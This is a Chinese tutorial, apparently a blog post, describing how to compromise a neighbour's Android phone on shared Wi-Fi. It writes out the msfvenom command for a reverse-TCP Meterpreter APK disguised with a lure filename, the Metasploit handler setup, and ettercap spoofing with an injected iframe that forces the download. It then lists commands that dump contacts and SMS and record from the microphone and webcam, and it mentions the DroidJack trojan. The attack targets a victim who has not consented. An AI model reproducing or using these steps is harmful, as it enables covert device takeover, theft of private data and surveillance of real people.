前言:
连别人的wifi不搞事情怎么可能?最近在学zANTI,不过不熟,咱们依旧kali走起。
做案工具:
Kali Linux(咳咳,开始。。。)
正文:
首先启动msf
先用kali生成一个安卓木马,如下命令:
Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk
为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻
然后进入Msf
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.0.109 //ip为kaili的ip
set LPORT 44444 //端口一定要与前面生成的木马的端口一致
Exploit
下面我们开启ettercap -G
我物理IP为
别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的,
下面我们来设置一下
在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:
<,iframe src=http://192.168.0.109/ribenav.apk><,/iframe> 把那两个逗号删了
因为apk文件嘛要想直接提示下载,用iframe语句就OK了,
下面我们开始攻击
大概过了5分钟多,发现反弹成功了
执行命令
dump_contacts --》这个是导出电话
dump_sms --》这个是导出信息
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
我们打开看一下电话薄
我们同时欺骗成DroidJack木马,使用方法如图:
切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口
网友评论